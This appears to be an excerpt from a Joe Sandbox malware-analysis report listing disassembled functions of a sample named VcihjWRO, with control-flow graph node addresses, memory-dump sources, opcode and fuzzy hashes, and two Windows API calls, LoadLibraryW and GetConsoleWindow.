                                                          Function 075EF3F0 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 814 75ef3f0-75ef419 815 75ef41e-75ef44e call 75eeb30 814->815 816 75ef41b 814->816 820 75ef4ac-75ef4bb call 75eeb30 815->820 821 75ef450-75ef45f call 75eeb30 815->821 816->815 828 75ef4bd-75ef4d3 820->828 829 75ef4d5-75ef4e9 820->829 826 75ef494-75ef49f 821->826 827 75ef461-75ef471 821->827 833 75ef4a8-75ef4aa 826->833 827->826 830 75ef473-75ef492 call 75ea220 827->830 835 75ef4eb-75ef529 828->835 829->835 830->820 830->826 833->835 839 75ef52b-75ef533 835->839 840 75ef535-75ef53b 835->840 841 75ef53e-75ef540 839->841 840->841 842 75ef549-75ef56e call 75e33c0 call 75e3438 841->842 843 75ef542-75ef547 841->843 864 75ef583 842->864 865 75ef570-75ef581 842->865 844 75ef586-75ef588 843->844 845 75ef58a-75ef58e 844->845 846 75ef5d0-75ef5d7 844->846 845->846 848 75ef590-75ef5b9 845->848 850 75ef84e-75ef87f call 75e1d40 846->850 851 75ef5dd-75ef5e7 call 75eeb10 846->851 862 75ef5bb-75ef5bd 848->862 863 75ef5c5-75ef5cb 848->863 873 75ef88b-75ef892 850->873 874 75ef881-75ef883 850->874 860 75ef65d-75ef664 851->860 861 75ef5e9-75ef5ed 851->861 868 75ef66a-75ef67c 860->868 869 75ef6f2-75ef6fb 860->869 866 75ef5ef-75ef606 call 75e1d40 861->866 867 75ef60b-75ef658 call 75e1d00 call 75e1d20 861->867 862->863 871 75ef90f-75ef916 863->871 864->844 865->844 866->871 867->850 868->869 885 75ef67e-75ef682 868->885 876 75ef6fd-75ef703 869->876 877 75ef706-75ef74b call 75ebe30 869->877 882 75ef89a-75ef8a0 873->882 883 75ef894-75ef898 873->883 874->873 876->877 877->850 925 75ef751-75ef755 877->925 887 75ef8aa-75ef8ae 882->887 888 75ef8a2-75ef8a4 882->888 883->887 891 75ef684-75ef69b call 75e1d40 885->891 892 75ef6a0-75ef6ed call 75e1d00 call 75e1d20 885->892 895 75ef8d4-75ef8de call 75eeb10 887->895 896 75ef8b0-75ef8b9 887->896 888->887 894 75ef8a6 888->894 891->871 892->850 894->887 910 75ef900-75ef904 895->910 911 75ef8e0-75ef8f7 895->911 897 75ef8bb-75ef8c1 896->897 898 75ef8c3-75ef8ca 896->898 904 75ef8cd 897->904 898->904 904->895 914 75ef90d 910->914 915 75ef906 910->915 911->910 926 75ef8f9 911->926 914->871 915->914 927 75ef757-75ef76e call 75e1d40 925->927 928 75ef773-75ef776 925->928 926->910 927->871 931 75ef77c-75ef7ff call 75e1d00 call 75e1d20 928->931 932 75ef801-75ef843 call 75e1d00 call 75e1d20 928->932 931->850 932->850
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 05f2f27f4512f4fa86a4f83931f57d4493b625e380f0501a70d2e1d2860c2bb9
                                                          • Instruction ID: 0ee04a60b23f5b10ff532b635c99c6a6837608afa9b7fcd15d177d330f264be4
                                                          • Opcode Fuzzy Hash: 05f2f27f4512f4fa86a4f83931f57d4493b625e380f0501a70d2e1d2860c2bb9
                                                          • Instruction Fuzzy Hash: 98026CB1A0020ADFDB69DFB4D454AEE7BBABF88300F148469E5069B291DF35DD42CB50
                                                          Function 075EE088 Relevance: .6, Instructions: 629COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c38a5531ef7b96dfd5d2848379e767a52e771aef6e6f0f58873daaeeb683888
                                                          • Instruction ID: 28038308c527bab749f33cef0f6a5916634b4acb18f7bcd11f68321fccfbfdec
                                                          • Opcode Fuzzy Hash: 3c38a5531ef7b96dfd5d2848379e767a52e771aef6e6f0f58873daaeeb683888
                                                          • Instruction Fuzzy Hash: 2E427AB0A20341CFEB28CF65D4457AABBFAFF84315F14446EE5068B690DB75E882CB50
                                                          Function 075EC340 Relevance: .4, Instructions: 401COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 817842f77a3a06396160d341eb78637cbec5d39385b7949da5c0120ee1b467f9
                                                          • Instruction ID: e2c725807986c84c8c18b7a226a478f04ec3307da8dd8c31a353d64ca776870b
                                                          • Opcode Fuzzy Hash: 817842f77a3a06396160d341eb78637cbec5d39385b7949da5c0120ee1b467f9
                                                          • Instruction Fuzzy Hash: 32F150B4A00209DFDB08DFA8D854AAEBBF6FF88300F148569D806AB355DB35DD46CB51
                                                          Function 06BC75E8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 956 6bc75e8-6bc7630 958 6bc7638-6bc7663 LoadLibraryW 956->958 959 6bc7632-6bc7635 956->959 960 6bc766c-6bc7689 958->960 961 6bc7665-6bc766b 958->961 959->958 961->960
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06BC74A6), ref: 06BC7656
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446377805.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6bc0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 1358ab4be6e42ba10d9b9c223470f1a50f7f027a332666711b743159bd20305a
                                                          • Instruction ID: 97eb4661f8ca300eee557b5c2d6b7a54671ab3399974940fe8cc2b82c0a9a721
                                                          • Opcode Fuzzy Hash: 1358ab4be6e42ba10d9b9c223470f1a50f7f027a332666711b743159bd20305a
                                                          • Instruction Fuzzy Hash: E61114B6C016498FDB10DF9AC844ACEFBF5EF88324F14846AD429A7710D774A545CFA1
                                                          Function 06BC6F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 964 6bc6f98-6bc7630 966 6bc7638-6bc7663 LoadLibraryW 964->966 967 6bc7632-6bc7635 964->967 968 6bc766c-6bc7689 966->968 969 6bc7665-6bc766b 966->969 967->966 969->968
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06BC74A6), ref: 06BC7656
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446377805.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6bc0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: b865b0af425855384dcf5171251d7303f6912f7be996d3665ac537f913bc16d0
                                                          • Instruction ID: a6f8f5f9dff1ea19362fe8c16631ca91494b3ecbeff4f7fa5eab6b98c1914795
                                                          • Opcode Fuzzy Hash: b865b0af425855384dcf5171251d7303f6912f7be996d3665ac537f913bc16d0
                                                          • Instruction Fuzzy Hash: C41114B1D006498FDB10CF9AC444A9EFBF4EF88324F14846AD519B7310D775A545CFA4
                                                          Function 018C0CE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 972 18c0ce0-18c0d54 GetConsoleWindow 975 18c0d5d-18c0d82 972->975 976 18c0d56-18c0d5c 972->976 976->975
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2426112627.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_18c0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0
                                                          • Opcode ID: 84364b9ca6d91cd81ee2b2dfed4153dae7eb7c4338ad95d907ef81b699aca8d8
                                                          • Instruction ID: 79794a0e75f1cbd06eb571bf19737bc1c671441d9471b16ca5ee97730a6d24ca
                                                          • Opcode Fuzzy Hash: 84364b9ca6d91cd81ee2b2dfed4153dae7eb7c4338ad95d907ef81b699aca8d8
                                                          • Instruction Fuzzy Hash: E61132B1900349CFDB20DFAAC445BEEBBF5AF88724F24841ED519A7250C779A904CBA4
                                                          Function 018C0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 980 18c0ce8-18c0d54 GetConsoleWindow 983 18c0d5d-18c0d82 980->983 984 18c0d56-18c0d5c 980->984 984->983
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2426112627.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_18c0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0
                                                          • Opcode ID: 56c29cd1ddda8624d99e67282e75141e0f42293fc383a2b8e5b6d0fb231f8c37
                                                          • Instruction ID: a8b14b3b4e2a984169bbd5e5898a06ad28dec70a9cfbfd3a3a628e1c8991b5a6
                                                          • Opcode Fuzzy Hash: 56c29cd1ddda8624d99e67282e75141e0f42293fc383a2b8e5b6d0fb231f8c37
                                                          • Instruction Fuzzy Hash: 6F113675D00349CFDB20DFAAC44579EFBF4AF88724F20841AD519A7240CB79A544CBA5
                                                          Function 06C11550 Relevance: 1.4, Instructions: 1420COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 988 6c11550-6c11573 989 6c11581-6c115d7 988->989 990 6c11575-6c11577 988->990 994 6c119a7-6c119f9 989->994 995 6c115dd-6c1160d 989->995 990->989 998 6c11a11-6c11a6c 994->998 999 6c119fb-6c11a01 994->999 995->994 1004 6c11613-6c11643 995->1004 1017 6c127b2-6c127f8 998->1017 1018 6c11a72-6c11a87 998->1018 1000 6c11a03 999->1000 1001 6c11a05-6c11a0f 999->1001 1000->998 1001->998 1004->994 1010 6c11649-6c11679 1004->1010 1010->994 1016 6c1167f-6c116af 1010->1016 1016->994 1028 6c116b5-6c116e5 1016->1028 1022 6c12810-6c12888 1017->1022 1023 6c127fa-6c12800 1017->1023 1018->1017 1024 6c11a8d-6c11abe 1018->1024 1049 6c128b2-6c128b9 1022->1049 1050 6c1288a-6c128b0 1022->1050 1026 6c12802 1023->1026 1027 6c12804-6c1280e 1023->1027 1036 6c11ac0-6c11ad6 1024->1036 1037 6c11ad8-6c11b24 1024->1037 1026->1022 1027->1022 1028->994 1038 6c116eb-6c1171b 1028->1038 1046 6c11b2b-6c11b48 1036->1046 1037->1046 1038->994 1052 6c11721-6c11751 1038->1052 1046->1017 1057 6c11b4e-6c11b80 1046->1057 1050->1049 1052->994 1061 6c11757-6c11787 1052->1061 1063 6c11b82-6c11b98 1057->1063 1064 6c11b9a-6c11be6 1057->1064 1061->994 1069 6c1178d-6c117bd 1061->1069 1073 6c11bed-6c11c0a 1063->1073 1064->1073 1069->994 1078 6c117c3-6c117da 1069->1078 1073->1017 1077 6c11c10-6c11c42 1073->1077 1084 6c11c44-6c11c5a 1077->1084 1085 6c11c5c-6c11ca8 1077->1085 1078->994 1082 6c117e0-6c1180c 1078->1082 1090 6c11836-6c11878 1082->1090 1091 6c1180e-6c11834 1082->1091 1096 6c11caf-6c11ccc 1084->1096 1085->1096 1109 6c11896-6c118a2 1090->1109 1110 6c1187a-6c11890 1090->1110 1105 6c118a8-6c118d5 1091->1105 1096->1017 1102 6c11cd2-6c11d04 1096->1102 1112 6c11d06-6c11d1c 1102->1112 1113 6c11d1e-6c11d6a 1102->1113 1105->994 1117 6c118db-6c1190f 1105->1117 1109->1105 1110->1109 1121 6c11d71-6c11d8e 1112->1121 1113->1121 1117->994 1125 6c11915-6c11958 1117->1125 1121->1017 1126 6c11d94-6c11dc6 1121->1126 1125->994 1138 6c1195a-6c1198a 1125->1138 1133 6c11de0-6c11e38 1126->1133 1134 6c11dc8-6c11dde 1126->1134 1142 6c11e3f-6c11e5c 1133->1142 1134->1142 1138->994 1148 6c1198c-6c119a4 1138->1148 1142->1017 1147 6c11e62-6c11e94 1142->1147 1152 6c11e96-6c11eac 1147->1152 1153 6c11eae-6c11f0c 1147->1153 1158 6c11f13-6c11f30 1152->1158 1153->1158 1158->1017 1161 6c11f36-6c11f68 1158->1161 1165 6c11f82-6c11fe0 1161->1165 1166 6c11f6a-6c11f80 1161->1166 1171 6c11fe7-6c12004 1165->1171 1166->1171 1171->1017 1175 6c1200a-6c1203c 1171->1175 1178 6c12056-6c120b4 1175->1178 1179 6c1203e-6c12054 1175->1179 1184 6c120bb-6c120d8 1178->1184 1179->1184 1184->1017 1188 6c120de-6c12110 1184->1188 1191 6c12112-6c12128 1188->1191 1192 6c1212a-6c12188 1188->1192 1197 6c1218f-6c121ac 1191->1197 1192->1197 1197->1017 1201 6c121b2-6c121c7 1197->1201 1201->1017 1203 6c121cd-6c121fe 1201->1203 1206 6c12200-6c12216 1203->1206 1207 6c12218-6c12276 1203->1207 1212 6c1227d-6c1229a 1206->1212 1207->1212 1212->1017 1216 6c122a0-6c122d2 1212->1216 1219 6c122d4-6c122ea 1216->1219 1220 6c122ec-6c1234a 1216->1220 1225 6c12351-6c1236e 1219->1225 1220->1225 1225->1017 1229 6c12374-6c123a6 1225->1229 1232 6c123c0-6c1241e 1229->1232 1233 6c123a8-6c123be 1229->1233 1238 6c12425-6c12442 1232->1238 1233->1238 1238->1017 1242 6c12448-6c1247a 1238->1242 1245 6c12494-6c124f2 1242->1245 1246 6c1247c-6c12492 1242->1246 1251 6c124f9-6c12516 1245->1251 1246->1251 1251->1017 1254 6c1251c-6c12531 1251->1254 1254->1017 1257 6c12537-6c12568 1254->1257 1260 6c12582-6c125e0 1257->1260 1261 6c1256a-6c12580 1257->1261 1266 6c125e7-6c12604 1260->1266 1261->1266 1266->1017 1270 6c1260a-6c1261f 1266->1270 1270->1017 1272 6c12625-6c12656 1270->1272 1275 6c12670-6c126ce 1272->1275 1276 6c12658-6c1266e 1272->1276 1281 6c126d5-6c126f2 1275->1281 1276->1281 1281->1017 1285 6c126f8-6c12724 1281->1285 1288 6c12726-6c1273c 1285->1288 1289 6c1273e-6c12793 1285->1289 1294 6c1279a-6c127af 1288->1294 1289->1294
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446560105.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6c10000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b66df5619f7a1608364d4db741f8f5a04bb57f5d24a0846c18e060850de04d16
                                                          • Instruction ID: 3e0b6c2652c87647603842b1665fbd59847a94f2aaf71ebcf482c5896bf1eac1
                                                          • Opcode Fuzzy Hash: b66df5619f7a1608364d4db741f8f5a04bb57f5d24a0846c18e060850de04d16
                                                          • Instruction Fuzzy Hash: 28C21C74B002189FCB54DF54C994BADBBB6FF89700F108099E606AB3A1DB71EE819F51
                                                          Function 075EF3E0 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1298 75ef3e0-75ef419 1300 75ef41e-75ef44e call 75eeb30 1298->1300 1301 75ef41b 1298->1301 1305 75ef4ac-75ef4bb call 75eeb30 1300->1305 1306 75ef450-75ef45f call 75eeb30 1300->1306 1301->1300 1313 75ef4bd-75ef4d3 1305->1313 1314 75ef4d5-75ef4e9 1305->1314 1311 75ef494-75ef49f 1306->1311 1312 75ef461-75ef471 1306->1312 1318 75ef4a8-75ef4aa 1311->1318 1312->1311 1315 75ef473-75ef492 call 75ea220 1312->1315 1320 75ef4eb-75ef529 1313->1320 1314->1320 1315->1305 1315->1311 1318->1320 1324 75ef52b-75ef533 1320->1324 1325 75ef535-75ef53b 1320->1325 1326 75ef53e-75ef540 1324->1326 1325->1326 1327 75ef549-75ef56e call 75e33c0 call 75e3438 1326->1327 1328 75ef542-75ef547 1326->1328 1349 75ef583 1327->1349 1350 75ef570-75ef581 1327->1350 1329 75ef586-75ef588 1328->1329 1330 75ef58a-75ef58e 1329->1330 1331 75ef5d0-75ef5d7 1329->1331 1330->1331 1333 75ef590-75ef5b9 1330->1333 1335 75ef84e-75ef87f call 75e1d40 1331->1335 1336 75ef5dd-75ef5e7 call 75eeb10 1331->1336 1347 75ef5bb-75ef5bd 1333->1347 1348 75ef5c5-75ef5cb 1333->1348 1358 75ef88b-75ef892 1335->1358 1359 75ef881-75ef883 1335->1359 1345 75ef65d-75ef664 1336->1345 1346 75ef5e9-75ef5ed 1336->1346 1353 75ef66a-75ef67c 1345->1353 1354 75ef6f2-75ef6fb 1345->1354 1351 75ef5ef-75ef606 call 75e1d40 1346->1351 1352 75ef60b-75ef658 call 75e1d00 call 75e1d20 1346->1352 1347->1348 1356 75ef90f-75ef916 1348->1356 1349->1329 1350->1329 1351->1356 1352->1335 1353->1354 1370 75ef67e-75ef682 1353->1370 1361 75ef6fd-75ef703 1354->1361 1362 75ef706-75ef74b call 75ebe30 1354->1362 1367 75ef89a-75ef8a0 1358->1367 1368 75ef894-75ef898 1358->1368 1359->1358 1361->1362 1362->1335 1410 75ef751-75ef755 1362->1410 1372 75ef8aa-75ef8ae 1367->1372 1373 75ef8a2-75ef8a4 1367->1373 1368->1372 1376 75ef684-75ef69b call 75e1d40 1370->1376 1377 75ef6a0-75ef6ed call 75e1d00 call 75e1d20 1370->1377 1380 75ef8d4-75ef8de call 75eeb10 1372->1380 1381 75ef8b0-75ef8b9 1372->1381 1373->1372 1379 75ef8a6 1373->1379 1376->1356 1377->1335 1379->1372 1395 75ef900-75ef904 1380->1395 1396 75ef8e0-75ef8f7 1380->1396 1382 75ef8bb-75ef8c1 1381->1382 1383 75ef8c3-75ef8ca 1381->1383 1389 75ef8cd 1382->1389 1383->1389 1389->1380 1399 75ef90d 1395->1399 1400 75ef906 1395->1400 1396->1395 1411 75ef8f9 1396->1411 1399->1356 1400->1399 1412 75ef757-75ef76e call 75e1d40 1410->1412 1413 75ef773-75ef776 1410->1413 1411->1395 1412->1356 1416 75ef77c-75ef7ff call 75e1d00 call 75e1d20 1413->1416 1417 75ef801-75ef843 call 75e1d00 call 75e1d20 1413->1417 1416->1335 1417->1335
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 6de048a0a119f1bd7ad9cc8984dbf13a2bc9fbc30e84bc10f9f18e81fe1b1e61
                                                          • Instruction ID: 3f62c4f9a7a8d25247ecef7e491f173650d4c37736037386b34c11fb98320be4
                                                          • Opcode Fuzzy Hash: 6de048a0a119f1bd7ad9cc8984dbf13a2bc9fbc30e84bc10f9f18e81fe1b1e61
                                                          • Instruction Fuzzy Hash: EF51BFB5A0024A9FDB15CF64D440EEEBFFABF89310F098066E9059B291DB31ED45CB90
                                                          Function 06C1349D Relevance: 1.3, Instructions: 1283COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1472 6c1349d-6c13526 1480 6c1352c-6c1355d 1472->1480 1483 6c1357b-6c135c7 1480->1483 1484 6c1355f-6c13578 1480->1484 1488 6c136d6-6c13706 1483->1488 1489 6c135cd-6c135df 1483->1489 1498 6c13798-6c137a3 1488->1498 1499 6c1370c-6c1371b 1488->1499 1492 6c135e1-6c135f0 1489->1492 1496 6c13663-6c13667 1492->1496 1497 6c135f2-6c13627 1492->1497 1500 6c13676 1496->1500 1501 6c13669-6c13674 1496->1501 1524 6c13629-6c1362f 1497->1524 1525 6c1363f-6c13661 1497->1525 1506 6c137ab-6c137b5 1498->1506 1511 6c1376b-6c1376f 1499->1511 1512 6c1371d-6c13746 1499->1512 1503 6c1367b-6c1367e 1500->1503 1501->1503 1504 6c13680-6c13684 1503->1504 1505 6c136b4-6c136d1 1503->1505 1509 6c13693 1504->1509 1510 6c13686-6c13691 1504->1510 1505->1506 1514 6c13695-6c13697 1509->1514 1510->1514 1515 6c13771-6c1377c 1511->1515 1516 6c1377e 1511->1516 1539 6c13748-6c1374e 1512->1539 1540 6c1375e-6c13769 1512->1540 1520 6c137b8-6c137c5 1514->1520 1521 6c1369d-6c136a6 1514->1521 1522 6c13780-6c13782 1515->1522 1516->1522 1528 6c137cc-6c137ea 1520->1528 1537 6c136a7-6c136ae 1521->1537 1527 6c13784-6c1378d 1522->1527 1522->1528 1530 6c13631 1524->1530 1531 6c13633-6c13635 1524->1531 1525->1537 1541 6c1378e-6c13792 1527->1541 1530->1525 1531->1525 1537->1492 1537->1505 1542 6c13750 1539->1542 1543 6c13752-6c13754 1539->1543 1540->1541 1541->1498 1541->1499 1542->1540 1543->1540
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446560105.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6c10000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0995eb23128c0ddd51617df8916ee854982a788c6fa0e51aafd24248f74f68f
                                                          • Instruction ID: 39e5e05a1cf46b8c22082161bda4473de104e8206a177db61c693023b2bbdd24
                                                          • Opcode Fuzzy Hash: d0995eb23128c0ddd51617df8916ee854982a788c6fa0e51aafd24248f74f68f
                                                          • Instruction Fuzzy Hash: A5A1D034B00245DFDB45CB68C954A6EBBF2FF89304B1480AAE61ADB3A2CB70DD01DB51
                                                          Function 06C10048 Relevance: .7, Instructions: 665COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446560105.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6c10000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 069d1ecd9a0af0640b7631fef367d7013821bd79d44f5dbeb963be1fcd69d5a5
                                                          • Instruction ID: 60235a28022fd9492e455ffb5a9dbd66e9e9d49c821092da9fa19e1536bd1553
                                                          • Opcode Fuzzy Hash: 069d1ecd9a0af0640b7631fef367d7013821bd79d44f5dbeb963be1fcd69d5a5
                                                          • Instruction Fuzzy Hash: 64425770710A16CFDB689F68D45066EBBB2FFC5700B005A1DD502AF391CFBAAD058B86
                                                          Function 06C119C8 Relevance: .6, Instructions: 572COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446560105.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6c10000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e2d80dccea1682d5e206567ea3985394655134e0d912fd3998e5fd6ea6b6113
                                                          • Instruction ID: ea66b3ff879c734dc1c944870e4b2a25591388959361ae3c24fa63bc2fa8e082
                                                          • Opcode Fuzzy Hash: 2e2d80dccea1682d5e206567ea3985394655134e0d912fd3998e5fd6ea6b6113
                                                          • Instruction Fuzzy Hash: 41224E74B002149FC754DB18C995EAEB7F6FF89704F118089EA0A9F391CB75EE818B91
                                                          Function 075EFAB8 Relevance: .5, Instructions: 532COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef4b8085cb242412dd39c46fee63eb2239b0ebd6b5588485609b1a63a9ace7a9
                                                          • Instruction ID: 921d5cdf9f5535bf9efdff5a8288979811789202ae3e29f8517a3e2a7204cd46
                                                          • Opcode Fuzzy Hash: ef4b8085cb242412dd39c46fee63eb2239b0ebd6b5588485609b1a63a9ace7a9
                                                          • Instruction Fuzzy Hash: 85B1FAB4A00606DFCB48DF68D484A9EBBF6FF88310B158559E949AB761DB30ED41CF90
                                                          Function 06C10001 Relevance: .4, Instructions: 351COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446560105.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6c10000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e77f5deb9be6755d8192173e41d1b2e15f2c9eb467390494ac5cca26b1b0ee3
                                                          • Instruction ID: 141ae2180b7df1bbe414530f358b79a6f6fd1db1f5a9250e6381cb056d801790
                                                          • Opcode Fuzzy Hash: 8e77f5deb9be6755d8192173e41d1b2e15f2c9eb467390494ac5cca26b1b0ee3
                                                          • Instruction Fuzzy Hash: CED17970B00644DFEB418F64C855B6A7BB6FF8A700F14819AE6019F3A2DBB1DD85CB91
                                                          Function 075ECC58 Relevance: .3, Instructions: 291COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c779489a7701f2a5d9fab00ee075a406660d0eb4b518143af0e2a4d382cc4cf5
                                                          • Instruction ID: e40bf84c0c73aa3fee53617d6c6cb84e4d73bc45a94bbce6e52c3e7cbe37e41e
                                                          • Opcode Fuzzy Hash: c779489a7701f2a5d9fab00ee075a406660d0eb4b518143af0e2a4d382cc4cf5
                                                          • Instruction Fuzzy Hash: B3B1B0B17002419FD329CB68C454AA6BBE7FF86310B19C5AAD559CB356CB30EC86C761
                                                          Function 06C13138 Relevance: .2, Instructions: 245COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446560105.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6c10000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e28c09bdb8001338b20884f5578dec1268bbea956a1730058f6309c8e45b0bd
                                                          • Instruction ID: ad2ec13bc3883c46bb2f868c81790c58bb7dfae36ecdcd667bae94e4d2edd344
                                                          • Opcode Fuzzy Hash: 2e28c09bdb8001338b20884f5578dec1268bbea956a1730058f6309c8e45b0bd
                                                          • Instruction Fuzzy Hash: 86916B34B102049FCB44DF68C98899ABBF2FF89714B1580A9E909EB361DB71ED01DB61
                                                          Function 075EFAB3 Relevance: .2, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6fb6f9f4eb829699798d1a147556db533cdc96f4f8024b095f56f17ab236670
